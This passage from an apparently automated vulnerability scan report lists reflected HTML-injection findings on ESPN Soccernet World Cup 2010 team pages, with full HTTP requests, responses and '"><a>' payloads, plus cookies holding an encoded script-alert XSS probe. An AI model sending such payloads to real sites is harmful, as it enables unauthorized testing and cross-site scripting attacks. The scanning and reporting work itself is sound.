SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:20:01 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:20:01 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN02
Cache-Expires: Sat, 06 Nov 2010 23:25:01 GMT
Content-Length: 81889
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Netherlands Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=449&accaf"><a>fe1ec450d74=1&_slug_=netherlands&accaf">
...[SNIP]...
|
2.27. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/451/south-korea |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1e3a"><a>0e9f0d0eed8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-koreab1e3a"><a>0e9f0d0eed8 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:29:10 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:29:10 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:34:10 GMT
Content-Length: 81932
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=451&_slug_=south-koreab1e3a"><a>0e9f0d0eed8&topId=792536&linktext=Huh+decides+not+to+renew+contract">
...[SNIP]...
|
2.28. http://soccernet.espn.go.com/worldcup2010/team/_/team/451/south-korea [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/451/south-korea |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28a78"><a>ad6c5189518 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/451/south-korea?28a78"><a>ad6c5189518=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:28 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:28 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN03
Cache-Expires: Sat, 06 Nov 2010 23:32:28 GMT
Content-Length: 82040
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Korea Footbal
...[SNIP]...
<a href="/worldcup2010/team?team=451&28a78"><a>ad6c5189518=1&_slug_=south-korea&28a78">
...[SNIP]...
|
2.29. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/455/greece |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf60"><a>27f1ff77858 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece5bf60"><a>27f1ff77858 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:10:41 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:10:41 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN13
Cache-Expires: Sat, 06 Nov 2010 23:15:41 GMT
Content-Length: 82126
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Greece Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=455&_slug_=greece5bf60"><a>27f1ff77858&topId=766098&linktext=Rehhagel+steps+down+as+Greece+coach">
...[SNIP]...
|
2.30. http://soccernet.espn.go.com/worldcup2010/team/_/team/455/greece [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/455/greece |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9866"><a>90f66760c97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/455/greece?a9866"><a>90f66760c97=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:08:55 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:08:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN11
Cache-Expires: Sat, 06 Nov 2010 23:13:54 GMT
Content-Length: 82234
Connection: close
Via: 8810-07/08
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Greece Football / S
...[SNIP]...
<a href="/worldcup2010/team?team=455&a9866"><a>90f66760c97=1&_slug_=greece&a9866">
...[SNIP]...
|
2.31. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/467/south-africa |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f1e2"><a>30af7f0b19c was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa6f1e2"><a>30af7f0b19c HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:58 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN17
Cache-Expires: Sat, 06 Nov 2010 23:33:58 GMT
Content-Length: 82316
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Africa Footba
...[SNIP]...
<a href="/worldcup2010/team?team=467&_slug_=south-africa6f1e2"><a>30af7f0b19c&topId=792945&linktext=South+African+president+praises+side">
...[SNIP]...
|
2.32. http://soccernet.espn.go.com/worldcup2010/team/_/team/467/south-africa [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/467/south-africa |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c1ec"><a>0e9b1b1a4b5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/467/south-africa?4c1ec"><a>0e9b1b1a4b5=1 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:27:13 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:27:13 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN33
Cache-Expires: Sat, 06 Nov 2010 23:32:12 GMT
Content-Length: 82424
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>South Africa Footba
...[SNIP]...
<a href="/worldcup2010/team?team=467&4c1ec"><a>0e9b1b1a4b5=1&_slug_=south-africa&4c1ec">
...[SNIP]...
|
2.33. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [REST URL parameter 6]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/468/slovakia |
Issue detail
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9049"><a>2c9ee8a6c83 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/468/slovakiac9049"><a>2c9ee8a6c83 HTTP/1.1
Host: soccernet.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
|
Response
HTTP/1.1 200 OK
Cache-Control: max-age=300
Date: Sat, 06 Nov 2010 23:28:25 GMT
Content-Type: text/html; charset=iso-8859-1
Last-Modified: Sat, 06 Nov 2010 23:28:25 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: ESPN16
Cache-Expires: Sat, 06 Nov 2010 23:33:25 GMT
Content-Length: 81977
Connection: close
Via: 8810-09/10
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Slovakia Football /
...[SNIP]...
<a href="/worldcup2010/team?team=468&_slug_=slovakiac9049"><a>2c9ee8a6c83&topId=803490&linktext=Dutch+ease+to+2-1+win+against+Slovakia">
...[SNIP]...
|
2.34. http://soccernet.espn.go.com/worldcup2010/team/_/team/468/slovakia [name of an arbitrarily supplied request parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Firm |
| Host: |
http://soccernet.espn.go.com |
| Path: |
/worldcup2010/team/_/team/468/slovakia |
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c864f"><a>dc103401107 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
